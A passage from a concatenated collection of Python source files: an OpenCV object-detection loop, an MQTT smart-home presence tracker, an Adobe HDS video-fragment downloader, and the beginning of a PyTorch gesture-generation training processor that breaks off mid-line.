frame[top:bottom+1, left:right+1][mask] = ([0.3*color[0], 0.3*color[1], 0.3*color[2]] + 0.7 * roi).astype(np.uint8)
# Draw the contours on the image
mask = mask.astype(np.uint8)
# cv2.findContours returns 3 values in OpenCV 3.x and 2 values in OpenCV 4.x
im2, contours, hierarchy = cv2.findContours(mask,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
cv2.drawContours(frame[top:bottom+1, left:right+1], contours, -1, color, 3, cv2.LINE_8, hierarchy, 100)
def load_training_set(filename):
'''
Load the data from a file and save them as a list
'''
training_set = []
f = open(filename, "r")
data = f.readlines()
index = 0
if f.mode == "r":
for line in data:
line = line.strip()
training_set.append(line.split(","))
# print((line.split(","))[-1])
f.close()
return training_set
exploration_map = [(0,0), (0,0), (0,0), (0,0), (0,0), (0,0), (0,0)]
zone = 1
n_frame = 0
# Set net and load model
print("[INFO] Loading model...")
if model == "ssd-mobilenet":
net = cv2.dnn.readNetFromCaffe(path_models + "MobileNetSSD_deploy.prototxt", path_models + "MobileNetSSD_deploy.caffemodel")
net.setPreferableTarget(cv2.dnn.DNN_TARGET_OPENCL_FP16)
elif model == "yolo3-tiny":
modelConfiguration = path_models + "yolov3-tiny.cfg";
modelWeights = path_models + "yolov3-tiny.weights";
net = cv2.dnn.readNetFromDarknet(modelConfiguration, modelWeights)
net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_OPENCL_FP16)
elif model == "yolo3-320" :
# Give the configuration and weight files for the model and load the network using them.
modelConfiguration = path_models + "yolov3.cfg";
modelWeights = path_models + "yolov3_320.weights";
net = cv2.dnn.readNetFromDarknet(modelConfiguration, modelWeights)
net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_OPENCL_FP16)
elif model == "yolo3-tiny":
modelConfiguration = path_models + "yolov3-tiny.cfg";
modelWeights = path_models + "yolov3-tiny.weights";
net = cv2.dnn.readNetFromDarknet(modelConfiguration, modelWeights)
net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_OPENCL_FP16)
elif model == "yolo3-416" :
# Give the configuration and weight files for the model and load the network using them.
modelConfiguration = path_models + "yolov3.cfg";
modelWeights = path_models + "yolov3_416.weights";
net = cv2.dnn.readNetFromDarknet(modelConfiguration, modelWeights)
net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_OPENCL_FP16)
elif model == "tensorflow":
net = cv2.dnn.readNetFromTensorflow(path_models + 'MobileNetSSDV2.pb', path_models + 'MobileNetSSDV2.pbtxt')
print("[INFO] Start adquisition...")
while True:
frame = myImage.copy()
cv2_im = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)
image = Image.fromarray(cv2_im)
if model == "ssd-mobilenet":
if (n_frame % 1) == 0:
# Runs the detection on a frame and return bounding boxes and predicted labels
detections = predict_detection(frame, net)
frame = draw_prediction(frame, detections, exploration_map, zone)
t, _ = net.getPerfProfile()
label = 'Inference time: %.2f ms' % (t * 1000.0 / cv2.getTickFrequency())
cv2.putText(frame, label, (0, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255))
#print(detections)
elif model == "tensorflow":
detections = []
rows, cols, channels = frame.shape
# Use the given image as input, which needs to be blob(s).
#blob = cv2.dnn.blobFromImage(frame, size=(300, 300), swapRB=True, crop=False)
#blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)),0.007843, (300, 300), 127.5)
blob = cv2.dnn.blobFromImage(frame, size=(300, 300), swapRB=True, crop=False)
net.setInput(blob)
out = net.forward()
for detection in out[0,0]:
classId = float(detection[1])
score = float(detection[2]) # == confidence
if score > 0.5:
try:
clase = str(classes[int(classId)])
score_str = str(score)
#print("Clase: " + clase + " " + str(int(classId)-1))
#print("Score: " + score_str)
left = detection[3] * cols
top = detection[4] * rows
right = detection[5] * cols
bottom = detection[6] * rows
#draw a red rectangle around detected objects
cv2.rectangle(frame, (int(left), int(top)), (int(right), int(bottom)), (0, 0, 255), thickness=2)
labelPosition = int(bottom) - 5
label = '%s:%s' % (clase, score_str)
cv2.putText(frame, label, (int(left), labelPosition),cv2.FONT_HERSHEY_DUPLEX, 0.4, (255, 255, 255), 1)
except Exception:
pass
# Put efficiency information. The function getPerfProfile returns the
# overall time for inference (t) and the timings for each of the layers (in layersTimes)
t, _ = net.getPerfProfile()
label = 'Inference time: %.2f ms' % (t * 1000.0 / cv2.getTickFrequency())
cv2.putText(frame, label, (0, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255))
else:
# Create a 4D blob from a frame.
blob = cv2.dnn.blobFromImage(frame, 1/255, (inpWidth, inpHeight), [0,0,0], 1, crop=False)
# Sets the input to the network
net.setInput(blob)
# Runs the forward pass to get output of the output layers
outs = net.forward(getOutputsNames(net))
# Remove the bounding boxes with low confidence
postprocess(frame, outs)
# Put efficiency information. The function getPerfProfile returns the
# overall time for inference(t) and the timings for each of the layers(in layersTimes)
t, _ = net.getPerfProfile()
label = 'Inference time: %.2f ms' % (t * 1000.0 / cv2.getTickFrequency())
cv2.putText(frame, label, (0, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255))
pub_image.publish(frame)
if(show_image == 1):
cv2.imshow("Object recognition", frame)
key = cv2.waitKey(1) & 0xFF
if key == ord('q'):
break
n_frame += 1
|
main_new.py | import time
from datetime import datetime
import pdb
BED_ROOM = "bedroom"
LIVING_ROOM = "livingroom"
KITCHEN = "kitchen"
OUTSIDE = "exit"
TOILET = "toilet"
ROOMS = [LIVING_ROOM, BED_ROOM, OUTSIDE, TOILET, KITCHEN]
VALID_TRANSITIONS = {
BED_ROOM: [LIVING_ROOM, TOILET],
LIVING_ROOM: [BED_ROOM, KITCHEN, OUTSIDE, TOILET],
KITCHEN: [LIVING_ROOM],
OUTSIDE: [LIVING_ROOM],
TOILET: [LIVING_ROOM, BED_ROOM]
}
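# VALID_TRANSITIONS encodes the house floor plan as an adjacency map: a
# presence reading in a room is only trusted if that room is directly
# reachable from the previously confirmed room.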
# used for connecting clients, subscribing and publishing to topics
BROKER = '192.168.0.102'
PORT = 1883
HOUSE_ID = "kjhouse"
DEVICE_TYPE = "NUC"
BPS_SENSOR = "bps"
MLX_SENSOR = "mlx"
from multiprocessing import Process, Manager
manager = Manager()
Global = manager.Namespace()
# to contain the status of all BPS in real time; initialize the
# manager-backed dict directly so the state is actually shared with the
# worker process (rebinding the name to a plain dict would break sharing)
binary_dict = manager.dict({
BED_ROOM: 0,
LIVING_ROOM: 0,
KITCHEN: 0,
OUTSIDE: 0,
TOILET: 0
})
# if the person has stayed in a particular room for longer than that room's cutoff time, a notification is sent over MQTT
ROOM_CUTOFF_TIME_MINUTES = {
BED_ROOM: 60,
LIVING_ROOM: 60,
KITCHEN: 60,
OUTSIDE: 60,
TOILET: 60,
}
Global.last_visited = LIVING_ROOM
Global.last_entered_time = datetime.now()
def on_connect(client, userdata, flags, rc):
if rc == 0:
print ("Connection OK!")
else:
print("Bad connection, Returned Code: ", rc)
def on_disconnect(client, userdata, rc=0): # paho-mqtt v1.x invokes this as (client, userdata, rc)
print("Disconnected result code " + str(rc))
def on_message(client,userdata, msg):
try:
# print("while true - id(binary_dict): {0}".format(id(binary_dict)))
topic=msg.topic
device_type, house_id, current_room = topic.split("/")
m_decode=str(msg.payload.decode("utf-8","ignore"))
"""
print("-----")
print("topic: {0}; m_decode: {1}".format(topic, m_decode))
print("binary_dict: {0};".format(binary_dict))
print("Global.last_entered_time: {0}".format(Global.last_entered_time))
print("Global.last_visited: {0}".format(Global.last_visited))
"""
if m_decode == "0" or m_decode == "1":
binary_dict[current_room] = int(m_decode)
# if the person has moved rooms
if Global.last_visited != current_room and m_decode == "1":
if is_valid_transition(current_room):
print("nuc - person travels from {0} to {1}".format(Global.last_visited, current_room))
Global.last_entered_time = datetime.now()
Global.last_visited = current_room
# activate respective MLX sensors according to the room where the person is in
topic = "nuc/kjhouse"
client.publish(topic, Global.last_visited)
"""
for room in ROOMS:
topic = "/".join([MLX_SENSOR, HOUSE_ID, room])
if room == Global.last_visited:
client.publish(topic, "1")
else:
client.publish(topic, "0")
"""
except Exception as e:
print("ERROR: {0}".format(e))
pdb.set_trace()
def is_valid_transition(current_room):
return current_room in VALID_TRANSITIONS[Global.last_visited]
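# Example: if the person was last seen in the kitchen, only a transition to
# the living room is accepted; a bedroom reading would be rejected as noise.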
def mqtt_worker():
# to run as a separate process
import paho.mqtt.client as mqtt
# MQTT Setup
client = mqtt.Client()
# Attach MQTT Client callback functions
client.on_connect = on_connect
client.on_disconnect = on_disconnect
client.on_message = on_message
print("Connecting to broker...", BROKER)
client.connect(BROKER, PORT)
# Subscribe to topics for bps sensors
for room in ROOMS:
print("Subscribing to ", room)
print("/".join([BPS_SENSOR, HOUSE_ID, room]))
client.subscribe("/".join([BPS_SENSOR, HOUSE_ID, room]))
client.publish("/".join([DEVICE_TYPE, HOUSE_ID, room]), "Started NUC!")
client.loop_forever()
mqtt_worker_process = Process(target=mqtt_worker)
mqtt_worker_process.start()
while True:
try:
time.sleep(1) # poll once per second instead of busy-waiting
# print("binary_dict: {0}; Global.last_entered_time: {1}".format(binary_dict, Global.last_entered_time))
cutoff_duration_minutes = ROOM_CUTOFF_TIME_MINUTES[Global.last_visited]
current_duration = datetime.now() - Global.last_entered_time
# print("binary_dict: {0}; current_duration(seconds): {1}; cutoff_duration_minutes: {2}".format(binary_dict, current_duration, cutoff_duration_minutes))
if current_duration.total_seconds() >= cutoff_duration_minutes * 60:
print("PONG")
mqtt_worker_process.terminate()
exit(0)
except KeyboardInterrupt:
print("Interrupt received.")
mqtt_worker_process.terminate()
exit(0)
|
AdobeHDS.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# M6 version 0.1 by k3c
import binascii
import struct
import sys
import os
import base64
import math
import xml.etree.ElementTree
import xml.sax
import re
from urlparse import urlparse, urlunparse
import string
import unicodedata
import Queue
import threading, thread
import time
try:
import urllib3
from urllib3.exceptions import HTTPError
hasUrllib3 = True
except ImportError:
import urllib2
from urllib2 import HTTPError
hasUrllib3 = False
NumWorkerThreads = 7
class GetUrl(object):
def __init__(self, url, fragnum):
self.url = url
self.fragNum = fragnum
self.data = None
self.errCount = 0
QueueUrl = Queue.PriorityQueue()
QueueUrlDone = Queue.PriorityQueue()
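# Both queues are priority queues keyed by fragment number: workers may fetch
# fragments out of order, but the writer thread (workerqdRun) pops completed
# fragments from QueueUrlDone in ascending order so the FLV is assembled
# sequentially.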
M6Item = None
def workerRun():
global QueueUrl, QueueUrlDone, M6Item
while not QueueUrl.empty() and M6Item.status == 'DOWNLOADING':
item = QueueUrl.get()[1]
fragUrl = item.url
try:
item.data = M6Item.getFile(fragUrl)
QueueUrlDone.put((item.fragNum, item))
except HTTPError, e:
print( sys.exc_info())
if item.errCount > 3:
M6Item.status = 'STOPPED'
# raise
else:
item.errCount += 1
QueueUrl.put((item.fragNum, item))
print( str(e.code) + " " + str(e.message))
QueueUrl.task_done()
# If we have exited the previous loop with error
while not QueueUrl.empty():
# print 'Ignore fragment', QueueUrl.get()[1].fragNum
QueueUrl.get()
def worker():
try:
workerRun()
except Exception, e:
print( sys.exc_info())
M6Item.status = 'STOPPED'
thread.interrupt_main()
def workerqdRun():
global QueueUrlDone, M6Item
currentFrag = 1
outFile = open(M6Item.localfilename, "wb")
M6Item.nbFragments = 19 # hard-coded fragment count, overriding the value parsed from the manifest
while currentFrag <= M6Item.nbFragments and M6Item.status == 'DOWNLOADING':
item = QueueUrlDone.get()[1]
if currentFrag == item.fragNum:
# M6Item.verifyFragment(item.data)
if not M6Item.decodeFragment(item.fragNum, item.data):
raise Exception('decodeFragment')
M6Item.videoFragment(item.fragNum, item.data, outFile)
print( 'Fragment', currentFrag, 'OK')
currentFrag += 1
requeue = False
else:
print( 'Requeue', item.fragNum)
QueueUrlDone.put((item.fragNum, item))
requeue = True
QueueUrlDone.task_done()
if requeue:
time.sleep(1)
outFile.close()
# If we have exited the previous loop with error
if currentFrag > M6Item.nbFragments:
M6Item.status = 'COMPLETED'
else:
while not QueueUrlDone.empty():
print( 'Ignore fragment', QueueUrlDone.get()[1].fragNum)
def workerqd():
try:
workerqdRun()
except Exception, e:
print( str(sys.exc_info()))
M6Item.status = 'STOPPED'
thread.interrupt_main()
validFilenameChars = "-_.() %s%s" % (string.ascii_letters, string.digits)
def removeDisallowedFilenameChars(filename):
"Remove invalid filename characters"
filename = filename.decode('ASCII', 'ignore')
cleanedFilename = unicodedata.normalize('NFKD', filename).encode('ASCII', 'ignore')
cleanedFilename = cleanedFilename.replace(' ', '_')
return ''.join(c for c in cleanedFilename if c in validFilenameChars)
class M6(object):
def __init__(self, url, dest = '', proxy=None ):
self.status = 'INIT'
self.url = url
self.proxy = proxy
self.bitrate = 0
self.duration = 0
self.nbFragments = 0
self.tagHeaderLen = 11
self.prevTagSize = 4
urlp = urlparse(url)
fn = os.path.basename(urlp.path)
#self.localfilename = \
# os.path.join(dest, os.path.splitext(fn)[0]) + '.flv'
self.localfilename = dest
#self.localfilename = removeDisallowedFilenameChars(self.localfilename)
self.urlbootstrap = ''
self.bootstrapInfoId = ''
self.baseUrl = urlunparse((urlp.scheme, urlp.netloc,
os.path.dirname(urlp.path),
'', '', ''))
if hasUrllib3:
self.pm = urllib3.PoolManager(num_pools=100)
# self.pm = urllib3.connection_from_url(self.baseUrl)
self.manifest = self.getManifest(self.url)
self.parseManifest()
# self.pm = urllib3.connection_from_url(self.urlbootstrap)
def download(self):
global QueueUrl, QueueUrlDone, M6Item
M6Item = self
self.status = 'DOWNLOADING'
# self.outFile = open(self.localfilename, "wb")
self.nbFragments = 19 # hard-coded fragment count, overriding the value computed from the manifest
for i in range(self.nbFragments):
fragUrl = self.urlbootstrap + 'Seg1-Frag'+str(i + 1)
QueueUrl.put((i + 1, GetUrl(fragUrl, i + 1)))
t = threading.Thread(target=workerqd)
# t.daemon = True
t.start()
for i in range(NumWorkerThreads):
t = threading.Thread(target=worker)
# t.daemon = True
t.start()
# QueueUrl.join()
# QueueUrlDone.join()
while self.status == 'DOWNLOADING':
try:
time.sleep(3)
except (KeyboardInterrupt, Exception), e:
print( sys.exc_info())
self.status = 'STOPPED'
# self.outFile.close()
if self.status != 'STOPPED':
self.status = 'COMPLETED'
def getInfos(self):
infos = {}
infos['status'] = self.status
infos['localfilename'] = self.localfilename
infos['proxy'] = self.proxy
infos['url'] = self.url
infos['bitrate'] = self.bitrate
infos['duration'] = self.duration
infos['nbFragments'] = self.nbFragments
infos['urlbootstrap'] = self.urlbootstrap
infos['baseUrl'] = self.baseUrl
#infos['drmId'] = self.drmAdditionalHeaderId
return infos
if hasUrllib3:
def getFile(self, url):
headers = urllib3.make_headers(
keep_alive=True,
user_agent='Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0',
accept_encoding=True)
r = self.pm.request('GET', url, headers=headers)
if r.status != 200:
print( 'Error downloading', r.status, url)
# sys.exit(1)
return r.data
else:
def getFile(self, url):
txheaders = {'User-Agent':
'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0',
'Keep-Alive' : '600',
'Connection' : 'keep-alive'
}
request = urllib2.Request(url, None, txheaders)
response = urllib2.urlopen(request)
return response.read()
def getManifest(self, url):
self.status = 'GETTING MANIFEST'
return xml.etree.ElementTree.fromstring(self.getFile(url))
def parseManifest(self):
self.status = 'PARSING MANIFEST'
try:
root = self.manifest
# Duration
self.duration = float(root.find("{http://ns.adobe.com/f4m/1.0}duration").text)
# number of fragments
self.nbFragments = int(math.ceil(self.duration/3))
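# assumes each HDS fragment covers roughly 3 seconds of video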
# streamid
self.streamid = root.findall("{http://ns.adobe.com/f4m/1.0}media")[-1]
# media
self.media = None
for media in root.findall('{http://ns.adobe.com/f4m/1.0}media'):
if int(media.attrib['bitrate']) > self.bitrate:
self.media = media
self.bitrate = int(media.attrib['bitrate'])
self.bootstrapInfoId = media.attrib['bootstrapInfoId']
#self.drmAdditionalHeaderId = media.attrib['drmAdditionalHeaderId']
self.flvHeader = base64.b64decode(media.find("{http://ns.adobe.com/f4m/1.0}metadata").text)
# Bootstrap URL
self.urlbootstrap = self.media.attrib["url"]
# urlbootstrap
self.urlbootstrap = self.baseUrl + "/" + self.urlbootstrap
except Exception, e:
print("Not possible to parse the manifest")
print( e)
sys.exit(-1)
def stop(self):
self.status = 'STOPPED'
def videoFragment(self, fragNum, data, fout):
start = self.videostart(fragNum, data)
if fragNum == 1:
self.videoBootstrap(fout)
fout.write(data[start:])
def videoBootstrap(self, fout):
# Append the FLV header
# fout.write(binascii.a2b_hex("464c560105000000090000000012"))
# fout.write(binascii.a2b_hex("00018700000000000000"))
bootstrap = "464c560105000000090000000012"
bootstrap += "%06X" % (len(self.flvHeader),)
bootstrap += "%06X%08X" % (0, 0)
fout.write(binascii.a2b_hex(bootstrap))
# Append the file metadata header
fout.write(self.flvHeader)
fout.write(binascii.a2b_hex("00019209"))
def videostart(self, fragNum, fragData):
"""
Find the start of the video data within a fragment
"""
start = fragData.find("mdat") + 12
# print "start ", start
# For all fragment (except frag1)
if (fragNum == 1):
start += 0
else:
# Skip 2 FLV tags
for dummy in range(2):
tagLen, = struct.unpack_from(">L", fragData, start) # Read 32 bits (big endian)
# print 'tagLen = %X' % tagLen
tagLen &= 0x00ffffff # Take the last 24 bits
# print 'tagLen2 = %X' % tagLen
start += tagLen + self.tagHeaderLen + 4 # 11 = tag header len ; 4 = tag footer len
return start
def readBoxHeader(self, data, pos=0):
boxSize, = struct.unpack_from(">L", data, pos) # Read 32 bits (big endian)
boxType = data[pos + 4 : pos + 8]
if boxSize == 1:
boxSize, = struct.unpack_from(">Q", data, pos + 8) # Read 64 bits (big endian)
boxSize -= 16
pos += 16
else:
boxSize -= 8
pos += 8
if boxSize <= 0:
boxSize = 0
return (pos, boxType, boxSize)
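# ISO BMFF (F4V/MP4) box header layout: a 32-bit big-endian size followed by a
# 4-byte type; a size field of 1 means the real size is in a 64-bit field that
# follows the type. The returned boxSize excludes the header bytes.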
def verifyFragment(self, data):
pos = 0
fragLen = len(data)
while pos < fragLen:
pos, boxType, boxSize = self.readBoxHeader(data, pos)
if boxType == 'mdat':
slen = len(data[pos:])
# print 'mdat %s' % (slen,)
if boxSize and slen == boxSize:
return True
else:
boxSize = fragLen - pos
pos += boxSize
return False
def decodeFragment(self, fragNum, data):
fragPos = 0
fragLen = len(data)
if not self.verifyFragment(data):
print( "Skipping fragment number", fragNum)
return False
while fragPos < fragLen:
fragPos, boxType, boxSize = self.readBoxHeader(data, fragPos)
if boxType == 'mdat':
fragLen = fragPos + boxSize
break
fragPos += boxSize
while fragPos < fragLen:
packetType = self.readInt8(data, fragPos)
packetSize = self.readInt24(data, fragPos + 1)
packetTS = self.readInt24(data, fragPos + 4)
packetTS |= self.readInt8(data, fragPos + 7) << 24
if packetTS & 0x80000000:
packetTS &= 0x7FFFFFFF
totalTagLen = self.tagHeaderLen + packetSize + self.prevTagSize
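# FLV tag layout: an 11-byte header (type, payload size, timestamp, stream id)
# followed by the payload and a trailing 4-byte PreviousTagSize field, which is
# why totalTagLen = 11 + packetSize + 4.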
# print 'decodeFragment', fragNum, packetType, packetSize, packetTS, totalTagLen
# time.sleep(1)
if packetType in (10, 11):
print( "This stream is encrypted with Akamai DRM. Decryption of such streams isn't currently possible with this script.")
return False
if packetType in (40, 41):
print( "This stream is encrypted with FlashAccess DRM. Decryption of such streams isn't currently possible with this script.")
return False
fragPos += totalTagLen
return True
def readInt8(self, data, pos):
return ord(struct.unpack_from(">c", data, pos)[0])
def readInt24(self, data, pos):
return struct.unpack_from(">L", "\0" + data[pos:pos + 3], 0)[0]
## manifest URL, Full Saved file name, WorkersThread
def main():
global NumWorkerThreads
if len(sys.argv) > 3:
NumWorkerThreads = int(sys.argv[3])
else:
NumWorkerThreads = 1
st = time.time()
x=M6('http://h264media01.ly.gov.tw:1935/vod/_definst_/mp4:300KClips/a7d6027a1ded6aa6982806f154ed24239c450e450740cf30fe001e560f0d6da5e9562172e945f005.mp4/manifest.f4m','./tmp1.flv')
#x = M6(sys.argv[1], sys.argv[2])
infos = x.getInfos()
for item in infos.items():
print( item[0]+' : '+str(item[1]))
x.download()
print( 'Download time:', time.time() - st)
if __name__ == "__main__":
main()
|
processor_v2.py | import datetime
import glob
import json
import librosa
import lmdb
import math
import matplotlib.pyplot as plt
import numpy as np
import os
import pickle
import pyarrow
import python_speech_features as ps
import threading
import time
import torch
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
from os.path import join as jn
from torchlight.torchlight.io import IO
import utils.common as cmn
from net.embedding_space_evaluator import EmbeddingSpaceEvaluator
from net.ser_att_conv_rnn_v1 import AttConvRNN
from net.multimodal_context_net_v2 import PoseGeneratorTriModal as PGT, ConvDiscriminatorTriModal as CDT
from net.multimodal_context_net_v2 import PoseGenerator, AffDiscriminator
from utils import losses
from utils.average_meter import AverageMeter
from utils.data_preprocessor import DataPreprocessor
from utils.gen_utils import create_video_and_save
from utils.mocap_dataset import MoCapDataset
from utils.ted_db_utils import *
torch.manual_seed(1234)
rec_loss = losses.quat_angle_loss
def find_all_substr(a_str, sub):
start = 0
while True:
start = a_str.find(sub, start)
if start == -1:
return
yield start
start += len(sub) # use start += 1 to find overlapping matches
def get_epoch_and_loss(path_to_model_files, epoch='best'):
all_models = os.listdir(path_to_model_files)
if len(all_models) < 2:
return '', None, np.inf
if epoch == 'best':
loss_list = -1. * np.ones(len(all_models))
for i, model in enumerate(all_models):
loss_val = str.split(model, '_')
if len(loss_val) > 1:
loss_list[i] = float(loss_val[3])
if len(loss_list) < 3:
best_model = all_models[np.argwhere(loss_list == min([n for n in loss_list if n > 0]))[0, 0]]
else:
loss_idx = np.argpartition(loss_list, 2)
best_model = all_models[loss_idx[1]]
all_underscores = list(find_all_substr(best_model, '_'))
# return model name, best loss
return best_model, int(best_model[all_underscores[0] + 1:all_underscores[1]]), \
float(best_model[all_underscores[2] + 1:all_underscores[3]])
assert isinstance(epoch, int)
found_model = None
for i, model in enumerate(all_models):
model_epoch = str.split(model, '_')
if len(model_epoch) > 1 and epoch == int(model_epoch[1]):
found_model = model
break
if found_model is None:
return '', None, np.inf
all_underscores = list(find_all_substr(found_model, '_'))
return found_model, int(found_model[all_underscores[0] + 1:all_underscores[1]]), \
float(found_model[all_underscores[2] + 1:all_underscores[3]])
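# Note: this parsing assumes checkpoint filenames of the form
# <prefix>_<epoch>_<something>_<loss>_..., i.e. the epoch sits between the
# first two underscores and the loss between the third and fourth.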
class Processor(object):
"""
Processor for emotive gesture generation
"""
def __init__(self, base_path, args, s2ag_config_args, data_loader, pose_dim, coords,
audio_sr, min_train_epochs=20, zfill=6):
self.device = torch.device('cuda:{}'.format(torch.cuda.current_device())
if torch.cuda.is_available() else 'cpu')
self.base_path = base_path
self.args = args
self.s2ag_config_args = s2ag_config_args
self.data_loader = data_loader
self.result = dict()
self.iter_info = dict()
self.epoch_info = dict()
self.meta_info = dict(epoch=0, iter=0)
self.io = IO(
self.args.work_dir_s2ag,
save_log=self.args.save_log,
print_log=self.args.print_log)
# model
self.pose_dim = pose_dim
self.coords = coords
self.audio_sr = audio_sr
if self.args.train_s2ag:
self.time_steps = self.data_loader['train_data_s2ag'].n_poses
self.audio_length = self.data_loader['train_data_s2ag'].expected_audio_length
self.spectrogram_length = self.data_loader['train_data_s2ag'].expected_spectrogram_length
self.num_mfcc = self.data_loader['train_data_s2ag'].num_mfcc_combined
self.lang_model = self.data_loader['train_data_s2ag'].lang_model
else:
self.time_steps = self.data_loader['test_data_s2ag'].n_poses
self.audio_length = self.data_loader['test_data_s2ag'].expected_audio_length
self.spectrogram_length = self.data_loader['test_data_s2ag'].expected_spectrogram_length
self.num_mfcc = self.data_loader['test_data_s2ag'].num_mfcc_combined
self.lang_model = self.data_loader['test_data_s2ag'].lang_model
self.mfcc_length = int(np.ceil(self.audio_length / 512))
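# 512 is assumed to be the hop length used when the MFCCs were extracted, so
# the number of MFCC frames is approximately audio samples / hop length.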
self.best_s2ag_loss = np.inf
self.best_s2ag_loss_epoch = None
self.s2ag_loss_updated = False
self.min_train_epochs = min_train_epochs
self.zfill = zfill
self.train_speaker_model = self.data_loader['train_data_s2ag'].speaker_model
self.val_speaker_model = self.data_loader['val_data_s2ag'].speaker_model
self.test_speaker_model = self.data_loader['test_data_s2ag'].speaker_model
self.trimodal_generator = PGT(self.s2ag_config_args,
pose_dim=self.pose_dim,
n_words=self.lang_model.n_words,
word_embed_size=self.s2ag_config_args.wordembed_dim,
word_embeddings=self.lang_model.word_embedding_weights,
z_obj=self.train_speaker_model)
self.trimodal_discriminator = CDT(self.pose_dim)
self.use_mfcc = True
if self.use_mfcc:
self.s2ag_generator = PoseGenerator(self.s2ag_config_args,
pose_dim=self.pose_dim,
n_words=self.lang_model.n_words,
word_embed_size=self.s2ag_config_args.wordembed_dim,
word_embeddings=self.lang_model.word_embedding_weights,
mfcc_length=self.mfcc_length,
num_mfcc=self.num_mfcc,
time_steps=self.time_steps,
z_obj=self.train_speaker_model)
else:
self.s2ag_generator = PGT(self.s2ag_config_args,
pose_dim=self.pose_dim,
n_words=self.lang_model.n_words,
word_embed_size=self.s2ag_config_args.wordembed_dim,
word_embeddings=self.lang_model.word_embedding_weights,
z_obj=self.train_speaker_model)
# self.s2ag_discriminator = CDT(self.pose_dim)
self.s2ag_discriminator = AffDiscriminator(self.pose_dim)
self.evaluator_trimodal = EmbeddingSpaceEvaluator(self.base_path, self.s2ag_config_args, self.pose_dim,
self.lang_model, self.device)
self.evaluator = EmbeddingSpaceEvaluator(self.base_path, self.s2ag_config_args, self.pose_dim,
self.lang_model, self.device)
if self.args.use_multiple_gpus and torch.cuda.device_count() > 1:
self.args.batch_size *= torch.cuda.device_count()
self.trimodal_generator = nn.DataParallel(self.trimodal_generator)
self.trimodal_discriminator = nn.DataParallel(self.trimodal_discriminator)
self.s2ag_generator = nn.DataParallel(self.s2ag_generator)
self.s2ag_discriminator = nn.DataParallel(self.s2ag_discriminator)
else:
self.trimodal_generator.to(self.device)
self.trimodal_discriminator.to(self.device)
self.s2ag_generator.to(self.device)
self.s2ag_discriminator.to(self.device)
npz_path = jn(self.args.data_path, self.args.dataset_s2ag, 'npz')
os.makedirs(npz_path, exist_ok=True)
self.num_test_samples = self.data_loader['test_data_s2ag'].n_samples
if self.args.train_s2ag:
self.num_train_samples = self.data_loader['train_data_s2ag'].n_samples
self.num_val_samples = self.data_loader['val_data_s2ag'].n_samples
self.num_total_samples = self.num_train_samples + self.num_val_samples + self.num_test_samples
print('Total s2ag training data:\t\t{:>6} ({:.2f}%)'.format(
self.num_train_samples, 100. * self.num_train_samples / self.num_total_samples))
print('Training s2ag with batch size:\t{:>6}'.format(self.args.batch_size))
train_dir_name = jn(npz_path, 'train')
if not os.path.exists(train_dir_name):
self.save_cache('train', train_dir_name)
self.load_cache('train', train_dir_name)
print('Total s2ag validation data:\t\t{:>6} ({:.2f}%)'.format(
self.num_val_samples, 100. * self.num_val_samples / self.num_total_samples))
val_dir_name = jn(npz_path, 'val')
if not os.path.exists(val_dir_name):
self.save_cache('val', val_dir_name)
self.load_cache('val', val_dir_name)
else:
self.train_samples = None
self.val_samples = None
self.num_total_samples = self.num_test_samples
print('Total s2ag testing data:\t\t{:>6} ({:.2f}%)'.format(
self.num_test_samples, 100. * self.num_test_samples / self.num_total_samples))
test_dir_name = jn(npz_path, 'test')
if not os.path.exists(test_dir_name):
self.save_cache('test', test_dir_name)
self.lr_s2ag_gen = self.s2ag_config_args.learning_rate
self.lr_s2ag_dis = self.s2ag_config_args.learning_rate * self.s2ag_config_args.discriminator_lr_weight
# s2ag optimizers
self.s2ag_gen_optimizer = optim.Adam(self.s2ag_generator.parameters(),
lr=self.lr_s2ag_gen, betas=(0.5, 0.999))
self.s2ag_dis_optimizer = torch.optim.Adam(
self.s2ag_discriminator.parameters(),
lr=self.lr_s2ag_dis,
betas=(0.5, 0.999))
def load_cache(self, part, dir_name, load_full=True):
print('Loading {} cache'.format(part), end='')
if load_full:
start_time = time.time()
npz = np.load(jn(dir_name, '../full', part + '.npz'), allow_pickle=True)
samples_dict = {'extended_word_seq': npz['extended_word_seq'],
'vec_seq': npz['vec_seq'],
'audio': npz['audio'],
'audio_max': npz['audio_max'],
'mfcc_features': npz['mfcc_features'].astype(np.float16),
'vid_indices': npz['vid_indices']
}
if part == 'train':
self.train_samples = samples_dict
elif part == 'val':
self.val_samples = samples_dict
elif part == 'test':
self.test_samples = samples_dict
print(' took {:>6} seconds.'.format(int(np.ceil(time.time() - start_time))))
else:
num_samples = self.num_train_samples if part == 'train' else (self.num_val_samples if part == 'val' else self.num_test_samples)
samples_dict = {'extended_word_seq': [],
'vec_seq': [],
'audio': [],
'audio_max': [],
'mfcc_features': [],
'vid_indices': []}
for k in range(num_samples):
start_time = time.time()
npz = np.load(jn(dir_name, str(k).zfill(6) + '.npz'), allow_pickle=True)
samples_dict['extended_word_seq'].append(npz['extended_word_seq'])
samples_dict['vec_seq'].append(npz['vec_seq'])
samples_dict['audio'].append(npz['audio'])
samples_dict['audio_max'].append(npz['audio_max'])
samples_dict['mfcc_features'].append(npz['mfcc_features'].astype(np.float16))
samples_dict['vid_indices'].append(npz['vid_indices'])
time_taken = time.time() - start_time
time_remaining = np.ceil((num_samples - k - 1) * time_taken)
print('\rLoading {} cache {:>6}/{}, estimated time remaining {}.'.format(part, k + 1, num_samples,
